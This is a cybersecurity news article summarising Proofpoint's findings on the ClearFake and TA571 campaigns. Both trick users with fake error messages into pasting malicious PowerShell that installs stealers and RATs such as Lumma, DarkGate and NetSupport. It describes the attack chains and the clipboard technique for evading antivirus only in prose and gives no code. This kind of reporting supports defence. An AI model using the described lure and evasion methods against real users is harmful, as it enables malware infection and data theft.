New Social Engineering Trick: Hackers Use PowerShell to Spread Malware!

Attackers are using a social engineering technique to trick users into running malicious PowerShell scripts by presenting a fake error message with instructions to copy and paste a script into PowerShell, infecting the system with malware like DarkGate or information stealers. 

The technique, observed since March 2024, leverages both malspam and compromised websites to deliver the malicious script via popups. 

Malicious fake warning instructing recipients to copy a PowerShell script and run it in the PowerShell Terminal. 

In the ClearFake campaign, attackers compromised legitimate websites to inject malicious scripts, which used EtherHiding to load a Keitaro TDS filtered script, and if the script passed checks, a fake warning overlay instructed users to copy and run a PowerShell script. 

This script flushed the DNS cache, downloaded another script, and checked system temperatures. If successful, it downloaded an AES-encrypted PowerShell script that retrieved a data.zip archive. 

The archive contained legitimate executables that side-loaded a trojanized DLL, which in turn used DOILoader to load Lumma Stealer, which downloaded additional malware, including Amadey Loader, a downloader for a crypto miner, a clipboard hijacker, and potentially JaskaGO malware. 

Example ClearFake attack chain.  

Researchers at Proofpoint discovered compromised websites injecting an iframe on pley[.]es in April 2024, which displayed a fake error message tricking users into running a PowerShell script that would download Vidar Stealer, while the payload domain was taken down shortly after, rendering the initial attack ineffective. 

Days later, the iframe content was replaced with a ClearFake injection, which is still active as of June 2024, and it’s unclear if these are two separate attacks or if the ClearFake actor took over the compromised iframe. 

iframe content as on 07 June 2024. 

TA571 Campaign:

TA571, a spam distributor, launched email campaigns with HTML attachments disguised as Microsoft Word or OneDrive documents by displaying fake error messages, prompting users to click the “How to Fix” or “Auto-Fix” buttons. 

Clicking these buttons would copy malicious PowerShell commands to the clipboard and instruct users to execute them through the PowerShell terminal or Run dialog, which downloads and installs malware like Matanbuchus, DarkGate, or NetSupport RAT. 

In order to avoid detection, TA571 updates its lures on a regular basis and employs strategies such as padding attachments. 

HTML attachment containing instructions on how to copy and paste PowerShell that leads to the installation of malware. 

Malicious actors TA571 and ClearFake are using browser-based JavaScript to inject PowerShell/CMD scripts into HTML attachments or websites, which are encoded in various ways and copied to the clipboard.  

The technique bypasses antivirus and EDR because the malicious code is executed directly from the clipboard without a file on disk and injects the script into the PowerShell terminal for one-click execution, while ClearFake uses the Run dialog, which may give users pause to review the code before execution. 

Also Read:

Kaaviya
Kaaviyahttps://cyberpress.org/
Kaaviya is a Security Editor and fellow reporter with Cyber Press. She is covering various cyber security incidents happening in the Cyber Space.

Recent Articles

Related Stories

LEAVE A REPLY

Please enter your comment!
Please enter your name here